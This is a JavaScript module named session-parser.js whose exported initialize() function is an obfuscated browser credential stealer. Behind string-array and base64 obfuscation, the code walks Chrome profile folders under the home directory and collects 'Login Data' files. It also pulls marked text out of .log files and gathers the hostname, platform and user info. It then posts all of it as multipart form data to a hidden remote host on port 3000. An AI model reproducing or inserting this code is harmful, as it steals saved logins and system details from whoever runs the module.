// session-parser/src/session-parser.js
function initialize() {
  const a0_0x455f5d = a0_0x1fbd;
  function a0_0x428c() {
    const _0x236083 = [
      "zM9YrwfJAa",
      "mtKWm0LgrNvAyW",
      "mty4mtjms3fHAvi",
      "q29UDgvUDc1uExbLoIbHChbSAwnHDgLVBI9Vy3rLDc1ZDhjLyw0ncG0k",
      "yuHsmgnbpt0",
      "vuHkDLPTBhnAut09",
      "tM1AAfe",
      "C3rYAw5NAwz5",
      "DxrMoa",
      "BgvUz3rO",
      "veC5ALLxDZ0",
      "veC5BLOYBhvAme52yM5sEwiYEhnAweK",
      "ndjUq01frLC",
      "sgTpDu4",
      "EfzVqu0",
      "CgXHDgzVCM0",
      "CMvHzezPBgvtEw5J",
      "yM10AwfxAg1zBvz2wJjgBfLxowXHr3HSwM01CMiYuMLAv1PUy0DKCMjTnd0",
      "zfHoBgnRBhvABtG9",
      "Aw5KzxHpzG",
      "iG0k",
      "zNjVBq",
      "t1rvDu1QrtjmALKZtgPjmq",
      "zMLSDgvY",
      "B1HpCMe",
      "nZG1mdCWuxHcsMDv",
      "zxHPC3rZu3LUyW",
      "zw5K",
      "Ag9ZDg5HBwu",
      "vLHoBgnPqKvzwfjO",
      "teDjswe",
      "wM1SBgjhuK9zvZfS",
      "sLfPEvK",
      "yNL0zuXLBMD0Aa",
      "mZqXmdvgtxPUu1i",
      "uhDfv1i",
      "ndi4uwj0DgjL",
      "veC5ALLxD2Dvm1jOzeDvpq",
      "mJiXndy4Ee5LDu1p",
      "zMf5tgy",
      "yuDwAfPhvNLJDZ09",
      "sgnUEe0",
      "yLDwmgfhowS",
      "uvHcD1jhrJbzut09",
      "zMLUza",
      "ue9tva",
      "iJSGzMLSzw5HBwu9iG",
      "q29UDgvUDc1eAxnWB3nPDgLVBJOGzM9YBs1KyxrHoYbUyw1Lpsi",
      "yMfZzw5HBwu",
      "uJi5DLOYEgW",
      "ywv4sMi",
      "y0Dgmgfbpt0",
      "nZjbDwrsAKe",
      "t3H3qKy",
      "sNHWveW",
      "EMzVvuK",
      "C0T2wvy",
      "uZjwnwnTBhvAme52yM5sEwiYEhnAweK9",
      "B0jOvNa",
      "vLDOAu8",
      "sujiCxC",
      "wM5npq",
      "reTSEfe",
      "ue1XthO",
      "C3rHCNrZv2L0Aa",
      "ru55Eei",
      "ChvZAa",
      "BxvSDgLWyxj0l2zVCM0Tzgf0ytSGyM91BMrHCNK9",
      "v0vICK0",
      "tdnwD2jhowHAqt09",
      "ndmXodK2oe9wtKfNuW",
      "nda2nZq0ohrnzeTgDW",
      "tfmWDeXtmhrwmLzPuZjSmfjToxLIvuP2zfC1A1LysJu",
      "AM9PBG",
      "y0C5Ewrbpt0",
      "Dg9tDhjPBMC",
      "mZqXmxfht0j6vG",
      "y0D4AgrhwNzJBta9",
      "CMfUzg9T",
      "veC5ALLxD2DswgGWwLC1EMfxoxvjrK5SzeHsCgjTzhO",
      "Cgf0Aa",
      "Ag9TzwrPCG",
      "ls0ncG",
      "z2XKsLK",
      "CMvHzgrPCLn5BMm",
      "tgDe",
      "y29Uy2f0",
      "yuC5EMrhnwHIv1u9",
      "iG0kdqO",
      "mKnnrKTuDW",
    ];
    a0_0x428c = function () {
      return _0x236083;
    };
    return a0_0x428c();
  }
  (function (_0x3c03cb, _0x1fc516) {
    const _0x14e177 = a0_0x1fbd,
      _0x120180 = _0x3c03cb();
    while (!![]) {
      try {
        const _0x1bb8ad =
          (-parseInt(_0x14e177(0x128)) / 0x1) *
            (parseInt(_0x14e177(0x101)) / 0x2) +
          (-parseInt(_0x14e177(0xf4)) / 0x3) *
            (parseInt(_0x14e177(0x126)) / 0x4) +
          (parseInt(_0x14e177(0x124)) / 0x5) *
            (-parseInt(_0x14e177(0x10e)) / 0x6) +
          parseInt(_0x14e177(0xef)) / 0x7 +
          parseInt(_0x14e177(0xee)) / 0x8 +
          (parseInt(_0x14e177(0xdc)) / 0x9) *
            (-parseInt(_0x14e177(0x11b)) / 0xa) +
          (parseInt(_0x14e177(0x103)) / 0xb) *
            (parseInt(_0x14e177(0x104)) / 0xc);
        if (_0x1bb8ad === _0x1fc516) break;
        else _0x120180["push"](_0x120180["shift"]());
      } catch (_0x185d80) {
        _0x120180["push"](_0x120180["shift"]());
      }
    }
  })(a0_0x428c, 0x5413a);
  const a0_0x55c390 = (_0x2a71b2) =>
      Buffer["from"](_0x2a71b2, "base64")[a0_0x455f5d(0xf3)](
        a0_0x455f5d(0x10a)
      ),
    a0_0x311f1d = require(a0_0x55c390(a0_0x455f5d(0xe5))),
    a0_0x32036e = require(a0_0x55c390("cGF0aA==")),
    a0_0x333bad = require(a0_0x55c390("b3M=")),
    a0_0xd31622 = require(a0_0x55c390(a0_0x455f5d(0x106))),
    a0_0xb3d8e7 = a0_0x55c390(a0_0x455f5d(0x118)),
    a0_0x4c7b0d =
      a0_0x55c390(a0_0x455f5d(0xf0)) +
      Math[a0_0x455f5d(0xf6)]()[a0_0x455f5d(0xf3)](0x24)["substring"](0x2),
    a0_0x1d8f35 = a0_0x32036e[a0_0x455f5d(0xf1)](
      a0_0x333bad[a0_0x455f5d(0xf9)](),
      a0_0x55c390(a0_0x455f5d(0x12d)),
      a0_0x55c390(a0_0x455f5d(0x10c)),
      a0_0x55c390(a0_0x455f5d(0xd9)),
      a0_0x55c390("Q2hyb21l"),
      a0_0x55c390(a0_0x455f5d(0x11f))
    ),
    a0_0x36a97f = (_0xc97cb, _0x3afb03) => {
      const _0x7c790c = a0_0x455f5d,
        _0x5f34a5 = { sKvYV: _0x7c790c(0x105) };
      let _0x39f91f = Buffer["from"]("");
      for (const _0xb09421 in _0xc97cb) {
        _0x39f91f = Buffer[_0x7c790c(0xfe)]([
          _0x39f91f,
          Buffer["from"]("--" + a0_0x4c7b0d + "\x0d\x0a"),
          Buffer["from"](_0x7c790c(0xd7) + _0xb09421 + _0x7c790c(0x100)),
          Buffer["from"](_0xc97cb[_0xb09421] + "\x0d\x0a"),
        ]);
      }
      for (const _0x394f89 of _0x3afb03) {
        const _0xb1d893 = a0_0x311f1d["readFileSync"](_0x394f89["path"]);
        _0x39f91f = Buffer["concat"]([
          _0x39f91f,
          Buffer[_0x7c790c(0x117)]("--" + a0_0x4c7b0d + "\x0d\x0a"),
          Buffer[_0x7c790c(0x117)](
            "Content-Disposition:\x20form-data;\x20name=\x22" +
              _0x394f89["fieldName"] +
              _0x7c790c(0xd6) +
              a0_0x32036e[_0x7c790c(0xd8)](_0x394f89[_0x7c790c(0xf8)]) +
              _0x7c790c(0x116)
          ),
          Buffer[_0x7c790c(0x117)](_0x5f34a5[_0x7c790c(0xe0)]),
          _0xb1d893,
          Buffer[_0x7c790c(0x117)]("\x0d\x0a"),
        ]);
      }
      return (
        (_0x39f91f = Buffer["concat"]([
          _0x39f91f,
          Buffer["from"]("--" + a0_0x4c7b0d + _0x7c790c(0xfa)),
        ])),
        _0x39f91f
      );
    },
    a0_0x16fb9d = (_0x53de99, _0x10e090) => {
      const _0x408ad5 = a0_0x455f5d,
        _0x32ef12 = {
          fCuTc: function (_0x2ce201, _0x184ef5, _0x426de1) {
            return _0x2ce201(_0x184ef5, _0x426de1);
          },
          IBHqw: function (_0x3719dd, _0x3669f0) {
            return _0x3719dd(_0x3669f0);
          },
          WEbrM: function (_0x5c9743, _0x47aebb) {
            return _0x5c9743(_0x47aebb);
          },
          VWhiO: _0x408ad5(0xf2),
          JxpTL: "cGF0aA==",
          zfoUI: function (_0x44b882, _0x4c6dd4) {
            return _0x44b882(_0x4c6dd4);
          },
          UBVXw: _0x408ad5(0x12c),
          oBhVp: _0x408ad5(0x12f),
          aexJb: function (_0x3d68c0, _0x5a9ee3) {
            return _0x3d68c0(_0x5a9ee3);
          },
        },
        _0x13eeb2 = _0x32ef12["fCuTc"](a0_0x36a97f, _0x53de99, _0x10e090),
        _0x45bc90 = {
          [_0x32ef12[_0x408ad5(0xe4)](a0_0x55c390, "aG9zdG5hbWU=")]:
            a0_0xb3d8e7,
          [_0x32ef12[_0x408ad5(0xec)](
            a0_0x55c390,
            _0x32ef12[_0x408ad5(0xe3)]
          )]: 0xbb8,
          [_0x32ef12[_0x408ad5(0xe4)](a0_0x55c390, _0x32ef12[_0x408ad5(0xde)])]:
            a0_0x55c390(_0x408ad5(0xed)),
          [_0x32ef12[_0x408ad5(0xdf)](a0_0x55c390, _0x32ef12["UBVXw"])]:
            _0x32ef12[_0x408ad5(0xe2)],
          [_0x32ef12[_0x408ad5(0xda)](a0_0x55c390, _0x408ad5(0x12a))]: {
            "Content-Type": _0x408ad5(0xeb) + a0_0x4c7b0d,
            "Content-Length": Buffer[_0x408ad5(0x123)](_0x13eeb2),
          },
        },
        _0x46eef8 = a0_0xd31622["request"](_0x45bc90);
      _0x46eef8["write"](_0x13eeb2), _0x46eef8[_0x408ad5(0x11d)]();
    },
    a0_0x1170f8 = () => {
      const _0x489299 = a0_0x455f5d,
        _0x59134f = {
          gldJY: function (_0x2d04b0, _0x545890) {
            return _0x2d04b0(_0x545890);
          },
          dMhuR: _0x489299(0xe1),
          DKlxQ: function (_0x555c94, _0x4c4665) {
            return _0x555c94 !== _0x4c4665;
          },
          OxwBF: function (_0x569e81, _0x4e3cbd) {
            return _0x569e81 !== _0x4e3cbd;
          },
          NmzAF: function (_0x3dbf1e, _0x3200a6) {
            return _0x3dbf1e > _0x3200a6;
          },
          fayLf: function (_0x28cb95, _0x121395) {
            return _0x28cb95 + _0x121395;
          },
          LGIIa: _0x489299(0x10d),
          PMqLz: "TG9naW4gRGF0YQ==",
          HkOuN: _0x489299(0x121),
          ENyxB: "cGF0aA==",
          xVoAM: _0x489299(0x127),
          PwEWR: function (_0x37d924, _0xaf88f6) {
            return _0x37d924(_0xaf88f6);
          },
          oXOra: function (_0x7b33dd, _0x5122c6) {
            return _0x7b33dd(_0x5122c6);
          },
          NmZhQ: _0x489299(0xff),
          HcnxM: _0x489299(0xf5),
          JQiyY: _0x489299(0x114),
        },
        _0x3a6cc6 = [],
        _0x53f097 = {},
        _0x838dac = a0_0x311f1d[_0x489299(0xfc)](a0_0x1d8f35)[_0x489299(0x119)](
          (_0x48d4a7) =>
            _0x48d4a7[_0x489299(0xe8)](a0_0x55c390(_0x489299(0x107)))
        );
      _0x838dac[_0x489299(0x102)]((_0x4da81f, _0x5eabf4) => {
        const _0x5d5524 = _0x489299,
          _0x14c66a = a0_0x32036e[_0x5d5524(0xf1)](
            a0_0x1d8f35,
            _0x4da81f,
            _0x59134f[_0x5d5524(0xfb)](a0_0x55c390, _0x5d5524(0xf7)),
            _0x59134f[_0x5d5524(0xfb)](a0_0x55c390, _0x5d5524(0x113))
          );
        if (a0_0x311f1d[_0x5d5524(0x11c)](_0x14c66a)) {
          const _0x5654fe = a0_0x311f1d[_0x5d5524(0xfc)](_0x14c66a)[
            _0x5d5524(0x12e)
          ]((_0x8cd4b2) => _0x8cd4b2["endsWith"](".log"));
          if (_0x5654fe) {
            const _0x2a6d7f = a0_0x32036e["join"](_0x14c66a, _0x5654fe),
              _0x28c93a = a0_0x311f1d[_0x5d5524(0x112)](_0x2a6d7f, "utf8"),
              _0x4e0150 = _0x28c93a[_0x5d5524(0x115)](
                _0x59134f[_0x5d5524(0xfb)](a0_0x55c390, _0x59134f["dMhuR"])
              ),
              _0x190157 = _0x28c93a[_0x5d5524(0x115)](
                _0x59134f[_0x5d5524(0xfb)](
                  a0_0x55c390,
                  "TG9nZ2luZ0NvbnRyb2xsZXI="
                )
              );
            _0x59134f[_0x5d5524(0xe6)](_0x4e0150, -0x1) &&
              _0x59134f[_0x5d5524(0xdd)](_0x190157, -0x1) &&
              _0x59134f["NmzAF"](_0x190157, _0x4e0150) &&
              (_0x53f097[_0x5d5524(0xfd) + _0x5eabf4] = _0x28c93a["substring"](
                _0x4e0150,
                _0x59134f[_0x5d5524(0x129)](
                  _0x190157,
                  _0x59134f[_0x5d5524(0x120)][_0x5d5524(0x10b)]
                )
              ));
          }
        }
        const _0x180a3b = a0_0x32036e[_0x5d5524(0xf1)](
          a0_0x1d8f35,
          _0x4da81f,
          _0x59134f["gldJY"](a0_0x55c390, _0x59134f[_0x5d5524(0xe7)])
        );
        a0_0x311f1d[_0x5d5524(0x11c)](_0x180a3b) &&
          _0x3a6cc6["push"]({
            [_0x59134f["gldJY"](a0_0x55c390, _0x59134f[_0x5d5524(0x10f)])]:
              "LD" + _0x5eabf4,
            [a0_0x55c390(_0x59134f[_0x5d5524(0xe9)])]: _0x180a3b,
          });
      });
      const _0x51914f = a0_0x32036e["join"](
        a0_0x1d8f35,
        a0_0x55c390(_0x59134f[_0x489299(0x110)])
      );
      a0_0x311f1d[_0x489299(0x11c)](_0x51914f) &&
        _0x3a6cc6[_0x489299(0xea)]({
          [_0x59134f[_0x489299(0x125)](
            a0_0x55c390,
            _0x59134f[_0x489299(0x10f)]
          )]: "LS",
          [a0_0x55c390(_0x489299(0xdb))]: _0x51914f,
        });
      const _0x1de23f = {
        ..._0x53f097,
        [_0x59134f[_0x489299(0x11a)](a0_0x55c390, _0x59134f[_0x489299(0x108)])]:
          a0_0x333bad[_0x489299(0x11e)](),
        [_0x59134f[_0x489299(0x11a)](a0_0x55c390, _0x59134f[_0x489299(0x12b)])]:
          a0_0x333bad[_0x489299(0x111)](),
        [_0x59134f[_0x489299(0x11a)](a0_0x55c390, _0x59134f[_0x489299(0x122)])]:
          JSON[_0x489299(0x109)](a0_0x333bad["userInfo"]()),
      };
      a0_0x16fb9d(_0x1de23f, _0x3a6cc6);
    };
  function a0_0x1fbd(_0x36f6ed, _0x45baff) {
    const _0x428c28 = a0_0x428c();
    return (
      (a0_0x1fbd = function (_0x1fbdea, _0x5573f2) {
        _0x1fbdea = _0x1fbdea - 0xd6;
        let _0x16d9c5 = _0x428c28[_0x1fbdea];
        if (a0_0x1fbd["rnzpOM"] === undefined) {
          var _0x3e4320 = function (_0x31beb8) {
            const _0x31fee2 =
              "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=";
            let _0x3f38cb = "",
              _0x32b9cf = "";
            for (
              let _0x3d75e6 = 0x0, _0x497e66, _0x27ac3b, _0x2eef6f = 0x0;
              (_0x27ac3b = _0x31beb8["charAt"](_0x2eef6f++));
              ~_0x27ac3b &&
              ((_0x497e66 =
                _0x3d75e6 % 0x4 ? _0x497e66 * 0x40 + _0x27ac3b : _0x27ac3b),
              _0x3d75e6++ % 0x4)
                ? (_0x3f38cb += String["fromCharCode"](
                    0xff & (_0x497e66 >> ((-0x2 * _0x3d75e6) & 0x6))
                  ))
                : 0x0
            ) {
              _0x27ac3b = _0x31fee2["indexOf"](_0x27ac3b);
            }
            for (
              let _0x1121ff = 0x0, _0x332105 = _0x3f38cb["length"];
              _0x1121ff < _0x332105;
              _0x1121ff++
            ) {
              _0x32b9cf +=
                "%" +
                ("00" + _0x3f38cb["charCodeAt"](_0x1121ff)["toString"](0x10))[
                  "slice"
                ](-0x2);
            }
            return decodeURIComponent(_0x32b9cf);
          };
          (a0_0x1fbd["nXUzLU"] = _0x3e4320),
            (_0x36f6ed = arguments),
            (a0_0x1fbd["rnzpOM"] = !![]);
        }
        const _0x3b7c52 = _0x428c28[0x0],
          _0x24b7e0 = _0x1fbdea + _0x3b7c52,
          _0x359482 = _0x36f6ed[_0x24b7e0];
        return (
          !_0x359482
            ? ((_0x16d9c5 = a0_0x1fbd["nXUzLU"](_0x16d9c5)),
              (_0x36f6ed[_0x24b7e0] = _0x16d9c5))
            : (_0x16d9c5 = _0x359482),
          _0x16d9c5
        );
      }),
      a0_0x1fbd(_0x36f6ed, _0x45baff)
    );
  }
  a0_0x1170f8();
}

module.exports = { initialize };
